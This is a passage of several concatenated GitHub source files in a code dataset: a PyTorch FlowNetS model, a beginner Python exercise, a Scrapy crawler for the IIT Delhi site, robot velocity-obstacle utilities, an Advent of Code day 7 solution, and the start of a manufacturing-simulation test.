FlowNetS(nn.Module):\n def __init__(self, args, input_channels = 12, batchNorm=True):\n super(FlowNetS,self).__init__()\n\n self.batchNorm = batchNorm\n self.conv1 = conv(self.batchNorm, input_channels, 64, kernel_size=7, stride=2)\n self.conv2 = conv(self.batchNorm, 64, 128, kernel_size=5, stride=2)\n self.conv3 = conv(self.batchNorm, 128, 256, kernel_size=5, stride=2)\n self.conv3_1 = conv(self.batchNorm, 256, 256)\n self.conv4 = conv(self.batchNorm, 256, 512, stride=2)\n self.conv4_1 = conv(self.batchNorm, 512, 512)\n self.conv5 = conv(self.batchNorm, 512, 512, stride=2)\n self.conv5_1 = conv(self.batchNorm, 512, 512)\n self.conv6 = conv(self.batchNorm, 512, 1024, stride=2)\n self.conv6_1 = conv(self.batchNorm,1024, 1024)\n\n self.deconv5 = deconv(1024,512)\n self.deconv4 = deconv(1026,256)\n self.deconv3 = deconv(770,128)\n self.deconv2 = deconv(386,64)\n\n self.predict_flow6 = predict_flow(1024)\n self.predict_flow5 = predict_flow(1026)\n self.predict_flow4 = predict_flow(770)\n self.predict_flow3 = predict_flow(386)\n self.predict_flow2 = predict_flow(194)\n\n self.upsampled_flow6_to_5 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)\n self.upsampled_flow5_to_4 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)\n self.upsampled_flow4_to_3 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)\n self.upsampled_flow3_to_2 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)\n\n for m in 
self.modules():\n if isinstance(m, nn.Conv2d):\n if m.bias is not None:\n init.uniform_(m.bias)\n init.xavier_uniform_(m.weight)\n\n if isinstance(m, nn.ConvTranspose2d):\n if m.bias is not None:\n init.uniform_(m.bias)\n init.xavier_uniform_(m.weight)\n # init_deconv_bilinear(m.weight)\n self.upsample1 = nn.Upsample(scale_factor=4, mode='bilinear')\n\n def forward(self, x):\n out_conv1 = self.conv1(x)\n\n out_conv2 = self.conv2(out_conv1)\n out_conv3 = self.conv3_1(self.conv3(out_conv2))\n out_conv4 = self.conv4_1(self.conv4(out_conv3))\n out_conv5 = self.conv5_1(self.conv5(out_conv4))\n out_conv6 = self.conv6_1(self.conv6(out_conv5))\n\n flow6 = self.predict_flow6(out_conv6)\n flow6_up = self.upsampled_flow6_to_5(flow6)\n out_deconv5 = self.deconv5(out_conv6)\n \n concat5 = torch.cat((out_conv5,out_deconv5,flow6_up),1)\n flow5 = self.predict_flow5(concat5)\n flow5_up = self.upsampled_flow5_to_4(flow5)\n out_deconv4 = self.deconv4(concat5)\n \n concat4 = torch.cat((out_conv4,out_deconv4,flow5_up),1)\n flow4 = self.predict_flow4(concat4)\n flow4_up = self.upsampled_flow4_to_3(flow4)\n out_deconv3 = self.deconv3(concat4)\n \n concat3 = torch.cat((out_conv3,out_deconv3,flow4_up),1)\n flow3 = self.predict_flow3(concat3)\n flow3_up = self.upsampled_flow3_to_2(flow3)\n out_deconv2 = self.deconv2(concat3)\n\n concat2 = torch.cat((out_conv2,out_deconv2,flow3_up),1)\n flow2 = self.predict_flow2(concat2)\n\n if self.training:\n return flow2,flow3,flow4,flow5,flow6\n else:\n return flow2,\n\nclass FlowNet2S(FlowNetS):\n def __init__(self, args, batchNorm=False, div_flow=20):\n super(FlowNet2S,self).__init__(args, input_channels = 6, batchNorm=batchNorm)\n self.rgb_max = args['rgb_max']\n self.div_flow = div_flow\n \n def forward(self, inputs):\n rgb_mean = inputs.contiguous().view(inputs.size()[:2]+(-1,)).mean(dim=-1).view(inputs.size()[:2] + (1,1,1,))\n x = (inputs - rgb_mean) / self.rgb_max\n x = torch.cat( (x[:,:,0,:,:], x[:,:,1,:,:]), dim = 1)\n\n out_conv1 = self.conv1(x)\n\n out_conv2 = self.conv2(out_conv1)\n out_conv3 = self.conv3_1(self.conv3(out_conv2))\n out_conv4 = self.conv4_1(self.conv4(out_conv3))\n out_conv5 = self.conv5_1(self.conv5(out_conv4))\n out_conv6 = self.conv6_1(self.conv6(out_conv5))\n\n flow6 = self.predict_flow6(out_conv6)\n flow6_up = self.upsampled_flow6_to_5(flow6)\n out_deconv5 = self.deconv5(out_conv6)\n \n concat5 = torch.cat((out_conv5,out_deconv5,flow6_up),1)\n flow5 = self.predict_flow5(concat5)\n flow5_up = self.upsampled_flow5_to_4(flow5)\n out_deconv4 = self.deconv4(concat5)\n \n concat4 = torch.cat((out_conv4,out_deconv4,flow5_up),1)\n flow4 = self.predict_flow4(concat4)\n flow4_up = self.upsampled_flow4_to_3(flow4)\n out_deconv3 = self.deconv3(concat4)\n \n concat3 = torch.cat((out_conv3,out_deconv3,flow4_up),1)\n flow3 = self.predict_flow3(concat3)\n flow3_up = self.upsampled_flow3_to_2(flow3)\n out_deconv2 = self.deconv2(concat3)\n\n concat2 = torch.cat((out_conv2,out_deconv2,flow3_up),1)\n flow2 = self.predict_flow2(concat2)\n\n if self.training:\n return flow2,flow3,flow4,flow5,flow6\n else:\n return self.upsample1(flow2*self.div_flow)","repo_name":"GuardSkill/NAN_pytorch","sub_path":"flownetS.py","file_name":"flownetS.py","file_ext":"py","file_size_in_byte":7718,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"79"} +{"seq_id":"9947455377","text":" ###############################\n # #\n # Exercise 6 #\n # www.w3resource.com #\n ###############################\n\n# Write a Python program which accepts a 
sequence of comma-separated numbers from user and generate a list and a tuple\n# with those numbers.\n\n# Sample data : 3, 5, 7, 23\n# Output :\n# List : ['3', ' 5', ' 7', ' 23']\n# Tuple : ('3', ' 5', ' 7', ' 23')\n\nstring = input(\"Enter your numbers separated by commas : \")\nlist = []\nfor num in string.split(\",\"):\n    list.append(num)\n\ntuple = tuple(list)\n\nprint('List : ',list)\nprint('Tuple : ',tuple)\n\n# Also we can use\n# list = string.split(\",\")\n\n# str.split(sep=None, maxsplit=-1)\n#Return a list of the words in the string, using sep as the delimiter string. If maxsplit is given, at most maxsplit\n#splits are done (thus, the list will have at most maxsplit+1 elements). If maxsplit is not specified or -1, then there\n#is no limit on the number of splits (all possible splits are made).\n\n","repo_name":"euggrie/w3resources_python_exercises","sub_path":"Basic/exercise6.py","file_name":"exercise6.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"10550752352","text":"import datetime\nfrom scrapy import signals\nfrom scrapy.http import Request, Response\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom pymongo.collection import Collection, ReturnDocument\nfrom crawling__iitd.seeder import Seeder\nfrom crawling__iitd.mongo_creator import getMongoCollection\n\nclass IITDSpider(CrawlSpider):\n    name = \"iitd\"\n\n    allowed_domains = [\n        'iitd.ac.in',\n        'iitd.ernet.in'\n    ]\n\n    rules = [\n        Rule(LinkExtractor(), follow=True, callback=\"parse_item\",process_request=\"process_request\")\n    ]\n\n    start_urls = [\n        'https://home.iitd.ac.in/',\n    ]\n\n    #start_requests generates request for all links\n    def start_requests(self):\n        self.mongo_collection: Collection = getMongoCollection()\n        for url in self.start_urls:\n            doc = self.mongo_collection.find_one_and_update({\"url\": url}, {\"$setOnInsert\": {\n                \"crawl_details\": {},\n                \"scraped\": False}\n            }, upsert=True, return_document=ReturnDocument.AFTER)\n        \n        #seeder returns the crawl_info collection...so that Request could be yielded for previously crawled links(doc).\n        #initially crawl_info does not contain any data ...\n        for doc in Seeder(self.mongo_collection).seed():\n            url = doc['url']\n            self.logger.info(f\"Got {url} from seeder\")\n            yield Request(url, meta={\"mongo_doc\": doc})\n\n\n    def process_request(self, request: Request, response: Response):\n        self.logger.debug('Processing request')\n        \n        #newly visited links would not have mongo_doc in request.meta....so saving them in crawl_info ...once saved ...Request would be created for them and hence mongo_doc will then be present in request.meta\n        if \"mongo_doc\" not in request.meta:\n            request.meta[\"mongo_doc\"] = self.mongo_collection.find_one_and_update({\"url\": request.url},{\"$setOnInsert\": {\n                \"crawl_details\": {},\n                \"scraped\": False}\n            },upsert=True,return_document=ReturnDocument.AFTER)\n\n        #Drop this request if it has already been crawled\n        # if len(request.meta[\"mongo_doc\"][\"crawl_details\"]) != 0:\n        if request.meta[\"mongo_doc\"][\"scraped\"]!=False:\n            return None\n        \n        return request\n    \n    # def parse_item(self, response):\n    #     self.logger.info('Hello World Checking this function')\n    #     item = {\n    #         \"request\": response.request,\n    #         \"elastic_doc\": {\n    #             'url': response.url,\n    #             'status': response.status,\n    #             'title': response.xpath(\"//title\").get(),\n    #             'body': response.xpath(\"//body\").get(),\n    #             'link_text': 
response.meta['link_text'],\n # },\n # }\n\n # return item\n\n def parse_item(self,response) :\n if response.status==200:\n self.logger.info(f'Scraping Page with url {response.url}')\n body=self.extract_body(response)\n\n links=response.css('a')\n links_url=links.css('::attr(href)').extract()\n links_text=links.css('::text').extract()\n remove='\\n \\t \\f \\r \\b'\n for text in links_text:\n text=text.lstrip(remove)\n text=text.rstrip(remove)\n\n item = {\n \"url\":response.url, \n \"status\":response.status,\n \"title\":response.css('title::text').get(),\n \"meta_data\":response.css('meta').extract(),\n \"body\":body,\n \"crawled_on\":datetime.datetime.now(),\n \"links_url\":links_url,\n \"links_text\":links_text,\n }\n # doc = self.mongo_collection.find_one_and_update({\"url\": response.url},{\"$setOnInsert\": {\"crawl_details\": item,\"crawled_on\": datetime.datetime.now()}},upsert=True,return_document=ReturnDocument.AFTER)\n myquery = { 'url': response.url }\n newvalues = { \"$set\": { 'crawl_details' : item, 'scraped':True } }\n self.mongo_collection.update_one(myquery, newvalues)\n \n yield item \n else:\n yield None\n\n def extract_body(self,response):\n # all text data in heading, para, a, b tags is extracted\n body=[]\n # cheking for paragraphs\n paras=response.css('p::text').extract()\n for str in paras :\n if(self.check_string(str)==-1):\n paras.remove(str)\n body+=paras\n\n # checking for headings
\n headings=response.css('h2::text').extract()\n for str in headings:\n if(self.check_string(str)==-1):\n headings.remove(str)\n body+=headings\n \n # checking for bolds tags\n bolds=response.css('b::text').extract()\n for str in bolds:\n if(self.check_string(str)==-1):\n bolds.remove(str)\n body+=bolds\n\n # checking for all headings\n headings1=response.css('h1::text').extract()\n for str in headings1:\n if(self.check_string(str)==-1):\n headings1.remove(str)\n body+=headings1\n\n headings3=response.css('h3::text').extract()\n for str in headings3:\n if(self.check_string(str)==-1):\n headings3.remove(str)\n body+=headings3\n\n headings4=response.css('h4::text').extract()\n for str in headings4:\n if(self.check_string(str)==-1):\n headings4.remove(str)\n body+=headings4\n\n headings5=response.css('h5::text').extract()\n for str in headings5:\n if(self.check_string(str)==-1):\n headings5.remove(str)\n body+=headings5\n\n # checking for link texts\n links=response.css('a::text').extract()\n for str in links:\n if(self.check_string(str)==-1):\n links.remove(str)\n body+=links\n\n\n return body\n\n def check_string(self,str):\n remove=\"\\n \\t \\f \\r \\b \"\n str=str.lstrip(remove)\n str=str.rstrip(remove)\n if(len(str)<=2):\n return -1\n else:\n return 1\n","repo_name":"prahasR/IITD_SearchEngine","sub_path":"crawling__iitd/crawling__iitd/spiders/spidey.py","file_name":"spidey.py","file_ext":"py","file_size_in_byte":6209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"86557134004","text":"# imports\nimport math\nfrom math import cos, sin, atan2, radians, degrees, sqrt, hypot\nimport random\nimport time\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nfrom matplotlib.patches import Circle, Wedge, Polygon\n\n# Circle class\nclass Circle:\n\tdef __init__(self, loc, rad):\n\t\tself.x = loc[0]\n\t\tself.y = loc[1]\n\t\tself.r = rad\n\n\ndef plotRect(rectLists, ax):\n\tfor rectList in rectLists:\n\t\tx = rectList[0]\n\t\ty = rectList[1]\n\t\tw = rectList[2]\n\t\th = rectList[3]\n\t\trect = plt.Rectangle((x,y),w,h,alpha=.7, color = (0.5,0.5,0.5))\n\t\tax.add_artist(rect)\n\ndef check_vert(x,y, r, rect):\n\trect_x = rect[0]\n\trect_y = rect[1]\n\tw,h = rect[2], rect[3]\n\td1,_ = distance((rect_x,rect_y), (x,y))\n\td2,_ = distance((rect_x + w, rect_y), (x,y))\n\td3,_ = distance((rect_x, rect_y + h), (x,y))\n\td4,_ = distance((rect_x + w, rect_y + h), (x,y))\n\n\tif d1 <= r or d2 <= r or d3 <= r or d4 <= r:\n\t\treturn True\n\n\treturn False\n\ndef no_collision(px,py,rad,point_lists=[]):\n\t# rad = 70\n\tfor point_list in point_lists:\n\t\tx = point_list[0] #Rectangle bottom left x\n\t\ty = point_list[1] #Rectangle bottom left y\n\t\tw = point_list[2] #Rectangle width\n\t\th = point_list[3] #Rectangle height\n\n\t\tnew_x = x - rad\n\t\tnew_y = y - rad\n\t\tw = rad * 2 + w\n\t\th = rad * 2 + h\n\n\t\tif (px >= new_x and px <= new_x + w) and ( py >= new_y and py <= new_y + h ):\n\t\t\treturn False\n\treturn True\n\n# Distance between 2 points\ndef distance(loc1, loc2):\n\tx1,y1 = loc1\n\tx2,y2 = loc2\n\n\tprint(\"loc1:\", x1,y1)\n\tprint(\"loc2:\", x2,y2)\n\tx_dis = x2 - x1\n\ty_dis = y2 - y1\n\n\tprint(\"x_dis\", x_dis, \"y_dis\", y_dis)\n\n\ttheta = atan2(y_dis, x_dis) \n\tmag = sqrt(x_dis**2 + y_dis**2)\n\tprint(\"magnitude of dist\",mag)\n\n\treturn mag,theta\n\ndef circ_intersection(circ1, circ2):\n\tprint(\"Circle 1 info\", circ1.r, circ1.x, circ1.y)\n\tprint(\"Circle 2 info\", 
circ2.r, circ2.x, circ2.y)\n\tdis = hypot(circ2.x - circ1.x, circ2.y - circ1.y)\n\n\te_x = (circ2.x - circ1.x) / dis\n\te_y = (circ2.y - circ1.y) / dis\n\n\tx = (circ1.r * circ1.r - circ2.r * circ2.r + dis * dis) / (2 * dis)\n\ty = sqrt(circ1.r * circ1.r - x * x)\n\n\tp1 = (circ1.x + x * e_x - y * e_y, circ1.y + x * e_y + y * e_x)\n\tp2 = (circ1.x + x * e_x + y * e_y, circ1.y + x * e_y - y * e_x )\n\n\treturn p1,p2\n\ndef dot_prod(vector1, vector2):\n\tpass\n\ndef integrate(loc, velocity, timestep = 1):\n\tmag, theta = velocity\n\tx,y = loc\n\tx_speed = mag * cos(theta)\n\ty_speed = mag * sin(theta)\n\n\t# print(\"x_speed and y_speed\", x_speed, y_speed)\n\n\tnew_x = x + x_speed * timestep\n\tnew_y = y + y_speed * timestep\n\n\t# print(new_x,new_y)\n\treturn new_x, new_y\n\n\ndef getRVO(robot_a, robot_b):\n\n\talpha = 0.5\n\t# Find the first triangle\n\tA = robot_a.get_loc()\n\tAx, Ay = A\n\n\t# Find the the other 2 points of triangle. \n\t# Find point where tangent line from robot A intersect markovski sun of robotA and robotB\n\tmksvi_radius = robot_b.get_radius() * 2\n\tCx, Cy = robot_b.get_loc()\n\tAO = sqrt((Cx - Ax)**2 + (Cy - Ay)**2)\n\tprint(\"robot_a\", robot_a.get_loc(), \"robot_b\", robot_b.get_loc())\n\tprint(\"Ao\", AO, \"radius\", mksvi_radius)\n\tAP = sqrt((AO**2) - (mksvi_radius**2))\n\n\tP1,P2 = circ_intersection(Circle(robot_b.get_loc(), mksvi_radius),\n\t\tCircle(robot_a.get_loc(), AP))\n\n\t# Translate the points across velocity of a robotB\n\tmag_b, theta_b = robot_b.get_vel()\n\tmag_a, theta_a = robot_a.get_vel()\n\td_x = mag_b * cos(theta_b)\n\td_y = mag_b * sin(theta_b)\n\n\tP1x, P1y = P1\n\tP2x, P2y = P2\n\n\n\t# update triangle points\n\tA_new = Ax + d_x, Ay + d_y\n\tP1_new = P1x + d_x, P1y + d_y\n\tP2_new = P2x + d_x, P2y + d_y\n\n\t# Extend size of triangle\n\tmag, theta = distance (A_new,P1_new)\n\tP1_new = integrate(A_new, (2000, theta))\n\tmag, theta = distance (A_new,P2_new)\n\tP2_new = integrate(A_new, (2000, theta))\n\n\t# update triangle points again\n\n\t# change from VO to RVO\n\tmag_b, theta_b = robot_b.get_vel()\n\tmag_a, theta_a = robot_a.get_vel()\n\txa, ya = cos(theta_a) * alpha * mag_a, sin(theta_a) * alpha * mag_a\n\txb, yb = cos(theta_b) * alpha * mag_b, sin(theta_b) * alpha * mag_b\n\n\tx_sum, y_sum = xa + xb, ya + yb\n\tx_sum_a, y_sum_a = Ax + x_sum, Ay + y_sum\n\tvect_mag, vect_theta = distance(A_new, (x_sum_a, y_sum_a))\n\n\td_x = vect_mag * cos(vect_theta)\n\td_y = vect_mag * sin(vect_theta)\n\t\n\tA_new = A_new[0]+ d_x, A_new[1] + d_y\n\tP1_new = P1_new[0] + d_x, P1_new[1] + d_y\n\tP2_new = P2_new[0] + d_x, P2_new[1] + d_y\n\n\treturn [A_new, P1_new, P2_new]\n\ndef form_roadmap():\n\n\treturn [[(10,-10), (5,-10), (0,-10), (0,12), (-5,12), (-15,15), (-10,-10)],\n\t\t\t[(10,10), (0,0), (-5,0), (-10,0), (-10,10)]]\n\ndef plot_roadmap(ax, road_maps):\n\n\tlines = []\n\n\tfor road_map in road_maps:\n\t\tx = []\n\t\ty = []\n\t\tfor points in road_map:\n\t\t\tx.append(points[0])\n\t\t\ty.append(points[1])\n\n\t\tline, = ax.plot([], [], lw=2)\n\t\tline.set_data([], [])\n\t\tlines.append(line)\n\t\tline.set_data(x, y)\n\ndef line_inter(A,B):\n\ttol = 0.0002\n\tA1x, A1y = A[0]\n\tA2x, A2y = A[1]\n\n\tB1x, B1y = B[0]\n\tB2x, B2y = B[1]\n\n\t# slope\n\tma = (A2y - A1y) / (A2x - A1x) \n\tmb = (B2y - B1y) / (B2x - B1x) \n\n\t# intersecpts\n\tba = A1y - ma * A1x\n\tbb = B1y - mb * B1x\n\n\tprint(\"ma\", ma, mb)\n\tprint(\"ba\", ba, bb)\n\n\t# If lines intersect give a point half way between both lines\n\tif abs(ma - mb) < tol and abs(bb - ba) < 
tol:\n\t\td, mag = distance(A[0], B[0])\n\t\tmid_point = integrate(A[0], d/2) \n\t\tprint(\"same line\")\n\t\treturn mid_point\n\n\tx = (ba - bb)/ (mb - ma)\n\ty = (ma*bb - mb*ba) / (ma - mb)\n\n\treturn (x,y)\n\n\ndef consequence(vel1, vel2, loc1, loc2):\n\t# if magnitude of velocity is 0 there is no consequence\n\tif vel1[0] == 0 or vel2[0] == 0:\n\t\treturn 0\n\n\tA1 = loc1\n\tA2 = integrate(A1, vel1)\n\n\tB1 = loc2\n\tB2 = integrate(B1, vel2)\n\n\tprint(\"second point A\", A2)\n\tprint(\"second part B\", B2)\n\n\tint_point = line_inter((A1, A2),(B1, B2))\n\n\tif int_point is None: # no intersection\n\t\treturn 0\n\n\t# distance between robot A to int point is the consequence\n\tdist,_ = distance(A1, int_point)\n\treturn dist\n\ndef readPaths(directory):\n\troad_maps = []\n\tfilenames = []\n\n\tprint(directory)\n\n\tfor filename in os.listdir(directory):\n\t # filename = os.fsdecode(file)\n\t\tif filename.endswith(\"txt\"): \n\t\t\tfull_file_name = os.path.join(directory, filename)\n\t\t\tprint(full_file_name)\n\t\t\tfilenames.append(full_file_name)\n\t\telse:\n\t\t\tcontinue\n\n\tfor filename in filenames:\n\t\tlines = [line.rstrip() for line in open(filename) if len(line.rstrip()) > 0]\n\n\t\tif len(lines) == 0:\n\t\t print(\"That files empty\")\n\t\t sys.exit(1)\n\n\t\tcspace = lines[0].strip()\n\t\tif (cspace != 'R2' and cspace != 'SE2' and cspace!= 'Weird'):\n\t\t print (\"Unknown C-space Identifier: \", cspace)\n\t\t sys.exit(1)\n\n\t\tdata = [[float(x) for x in line.split(' ')] for line in lines[1:]]\n\t\troad_maps.append(data)\n\treturn road_maps\n\ndef plotRing(small_r, big_x, big_y, num_circles, big_rad):\n\tphi = 2 * math.pi\n\txvar = 2/num_circles\n\tstart = []\n\t\n\tfor i in range(0,num_circles):\n\t\tx = big_x + (big_rad * math.cos(phi + i * xvar * math.pi )) #x coordinate of small circle\n\t\ty = big_y + (big_rad * math.sin(phi + i * xvar * math.pi )) #y coordinate of small circle\n\t\tstart.append((x,y))\n\n\tnn = int(num_circles / 2)\n\tprint(nn)\n\tfirst_half = start[:nn]\n\tsecond_half = start[nn:]\n\tgoal = second_half + first_half\n\n\treturn start, goal\n\n\ndef inter_point(A,B,C,D):\n\ta1 = B[1] - A[1]\n\tb1 = A[0] - B[0]\n\n\tc1 = a1*A[0] + b1*A[1]\n\n\ta2 = D[1] - C[1]\n\tb2 = C[0] - D[0]\n\tc2 = a2*C[0] + b2*C[1]\n\n\tdeterminant = a1*b2 - a2*b1\n\n\tif (determinant == 0):\n\t\treturn False, (0,0)\n\t\n\tx = (b2*c1 - b1*c2)/determinant\n\ty = (a1*c2 - a2*c1)/determinant\n\n\treturn True, (x,y)\n\ndef get_penalty(robot1_loc, vel1, robot2_loc, vel2):\n\tA = robot1_loc\n\tB = integrate(A,vel1)\n\tC = robot2_loc\n\tD = integrate(C, vel2)\n\n\tcollision, int_point = inter_point(A,B,C,D)\n\tprint(\"A {}, B {}, C {}, D {}\".format(A,B,C,D))\n\tif collision:\n\t\tprint(\"A is {} and int point is {}\".format(A,int_point))\n\t\tdist, theta = distance(A, int_point)\n\n\t\tprint(\"dist is: {}\".format(dist))\n\t\tt = dist/vel1[0]\n\t\tpenalty = 1/t\n\n\t\treturn penalty\n\n\treturn 0\n\n\nif __name__ == \"__main__\":\t\n\t# vel1 = (1,radians(90))\n\t# vel2 = (1, radians(90+180))\n\t# loc1 = (0,0)\n\t# loc2 = (0,2)\n\t# print(\"consequences\", consequence(vel1, vel2, loc1, loc2))\n\t# radius = 2\n\t# big_x, big_y = 0,0\n\t# num_circles = 6\n\t# big_rad = 6\n\t# starts, goals = plotRing(radius, big_x,big_y,num_circles,big_rad)\n\t# print(starts)\n\t# print()\n\t# print(goals)\n\tpen = penalty((0,0),(sqrt(2),radians(45)), (3,1), (sqrt(2),radians(90+45)))\n\tprint(\"Penalty id 
{}\".format(pen))","repo_name":"Rhemaike/Intro_to_Robotics_submission","sub_path":"funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":8293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18399236224","text":"import readline\nimport mpmath\nfrom .global_functions import copy\nfrom sympy import parse_expr, simplify, Symbol\n\n\ndef introduction():\n print(\"\\nA2.A3 - simplify variable expressions using properties.\\n\")\n print(\"enter the expression.\")\n print(\"the program will return the simplified version of the expression.\")\n print(\"type 'e' to exit.\\n\")\n\n\ndef solve_ixl():\n while True:\n try:\n user_input = input()\n if user_input == \"e\":\n print(\"exiting a2.a3...\\n\")\n break\n\n expression = parse_expr(user_input)\n answer = str(simplify(expression))\n\n print(answer + \"\\n\")\n copy(answer)\n\n except Exception as e:\n print(str(e) + \"\\n\")\n","repo_name":"Fr0stium/ixl_Solver","sub_path":"algebra2/a2_a3.py","file_name":"a2_a3.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"11838444681","text":"#\n# Day 7 of Advent of Code 2022\n#\n\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\ndef read_input(filename):\n with open(filename, 'r') as f:\n return [line.strip() for line in f.readlines()]\n\ndef parse_input(lines, G):\n # root always exists\n G.add_node('/', labels=True, label='/', files = [])\n cwd = '/'\n for line in lines:\n line = line.split(' ')\n\n if line[0] == '$': # process a command\n listing = False\n if line[1] == 'cd':\n if line[2] == '..':\n # select parent node in G\n # remove last element from cwd excluding the '/'\n cwd = cwd[:cwd.rfind('/')]\n cwd = cwd[:cwd.rfind('/')] + '/'\n\n elif line[2] == '/':\n cwd = '/'\n else:\n cwd = cwd + line[2] + '/'\n elif line[1] == 'ls':\n listing = True\n else:\n # process a listing\n if line[0]=='dir':\n # create a directory if it does not exist\n newdir = cwd + line[1] + '/'\n for n in G.nodes:\n if n == newdir: break # directory already exists\n G.add_node(newdir, labels=True, label=line[1], color='red', files=[])\n G.add_edge(cwd, newdir)\n elif line[0]!='':\n # attach file to current working directory\n files = G.nodes[cwd]['files']\n files.append([line[0], line[1]])\n print(files)\n G.nodes[cwd]['files'] = files\n return\n\ndef dir_size(G, node):\n dir_fs = 0\n\n for f in G.nodes[node]['files']:\n dir_fs += int(f[0])\n\n for subdir in G.successors(node):\n\n dir_fs += dir_size(G, subdir)\n\n return dir_fs\n\n\n\n\ndef main():\n lines = read_input('input.txt')\n G = nx.DiGraph()\n parse_input(lines, G)\n\n total_fs = 0\n for n in G.nodes():\n # print(n)\n # print(G.nodes[n]['files'])\n ds = dir_size(G, n)\n if ds <= 100000: total_fs += ds\n\n print(\"The answer is: \", total_fs)\n\n\n# nx.draw(G, with_labels=True)\n# plt.show()\n\n\n # Part B\n NeededSpace = 30000000\n TotalDiskSpace = 70000000\n\n disk_usage = dir_size(G, '/')\n space_needed = NeededSpace - (TotalDiskSpace - disk_usage)\n dir_options = []\n for n in G.nodes():\n ds = dir_size(G, n)\n if ds >= space_needed:\n dir_options.append(ds)\n\n dir_options.sort()\n print(\"The answer is: \", dir_options[0])\n return\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"bdriessen/AOC2022","sub_path":"Day7/Day7.py","file_name":"Day7.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33526930143","text":"import sys\nimport os.path\nimport unittest\nsys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), \"..\")))\n\n\nfrom emulica import emulation\nimport logging\nlogger = logging.getLogger('test_sim10')\n\nEXP_RESULT_RESOURCE = [[(0, 0, 'setup'), \n (0, 2, 'load'), \n (7, 7, 'setup'), \n (7, 8, 'unload'), \n (8, 8, 'setup'), \n (8, 10, 'load'), \n (15, 15, 'setup'), \n (15, 16, 'unload'), \n (16, 16, 'setup'), \n (16, 18, 'load'), \n (23, 23, 'setup'), \n (23, 24, 'unload'), \n (24, 24, 'setup'), \n (24, 26, 'load'), \n (31, 31, 'setup'), \n (31, 32, 'unload'), \n (32, 32, 'setup'), \n (32, 34, 'load'), \n (39, 39, 'setup'), \n (39, 40, 'unload'), \n (40, 40, 'setup'), \n (40, 42, 'load'), \n (47, 47, 'setup'), \n (47, 48, 'unload'), \n (48, 48, 'setup'), \n (48, 50, 'load'), \n (55, 55, 'setup'), \n (55, 56, 'unload')], \n [(2, 2, 'setup'),\n (2, 7, 'p'),\n (10, 15, 'p'), \n (18, 23, 'p'),\n (26, 31, 'p'),\n (34, 39, 'p'),\n (42, 47, 'p'),\n (50, 55, 'p')]]\n\nEXP_RESULT_PRODUCT = [(1, [], [(0, 'source1'), (0, 'trans'), (2, 'assy_space'), (7, 'trans'), (8, 'sink')], 0, 56), \n (2, [], [(0, 'source1'), (8, 'trans'), (10, 'assy_space'), (15, 'trans'), (16, 'sink')], 0, 56), \n (3, [], [(0, 'source1'), (16, 'trans'), (18, 'assy_space'), (23, 'trans'), (24, 'sink')], 0, 56), \n (4, [], [(0, 'source1'), (24, 'trans'), (26, 'assy_space'), (31, 'trans'), (32, 'sink')], 0, 56), \n (5, [], [(0, 'source1'), (32, 'trans'), (34, 'assy_space'), (39, 'trans'), (40, 'sink')], 0, 56), \n (6, [], [(0, 'source1'), (40, 'trans'), (42, 'assy_space'), (47, 'trans'), (48, 'sink')], 0, 56), \n (7, [], [(0, 'source1'), (48, 'trans'), (50, 'assy_space'), (55, 'trans'), (56, 'sink')], 0, 56), \n (8, [], [(0, 'source2'), (2, 'assy_space'), (7, 'trans'), (8, 'sink')], 0, 56), \n (9, [], [(0, 'source2'), (10, 'assy_space'), (15, 'trans'), (16, 'sink')], 0, 56), \n (10, [], [(0, 'source2'), (18, 'assy_space'), (23, 'trans'), (24, 'sink')], 0, 56), \n (11, [], [(0, 'source2'), (26, 'assy_space'), (31, 'trans'), (32, 'sink')], 0, 56), \n (12, [], [(0, 'source2'), (34, 'assy_space'), (39, 'trans'), (40, 'sink')], 0, 56), \n (13, [], [(0, 'source2'), (42, 'assy_space'), (47, 'trans'), (48, 'sink')], 0, 56), \n (14, [], [(0, 'source2'), (50, 'assy_space'), (55, 'trans'), (56, 'sink')], 0, 56)]\n\nEMULATE_UNTIL = 100;\n\n\nclass ControlCreate(emulation.Process):\n def run(self, model):\n create1 = model.modules[\"create1\"]\n create2 = model.modules[\"create2\"]\n rp_crea1 = create1.create_report_socket()\n rp_crea2 = create2.create_report_socket()\n dates1 = [0, 1, 3, 7, 12, 20, 30]\n requests1 = [emulation.Request(\"create1\", \"create\",params={'productType':'type1', 'date': d}) for d in dates1]\n dates2 = [5, 6, 7, 9, 11, 23, 35]\n requests2 = [emulation.Request(\"create2\", \"create\",params={'productType':'type1', 'date': d}) for d in dates2]\n yield emulation.put, self, create1.request_socket, requests1\n yield emulation.get, self, rp_crea1, 7\n yield emulation.put, self, create2.request_socket, requests2\n yield emulation.get, self, rp_crea2, 7\n\nclass ControlAssy(emulation.Process):\n def run(self, model):\n trans = model.modules[\"trans\"]\n assy = model.modules[\"assy\"]\n rp_assy = assy.create_report_socket()\n obs1 = 
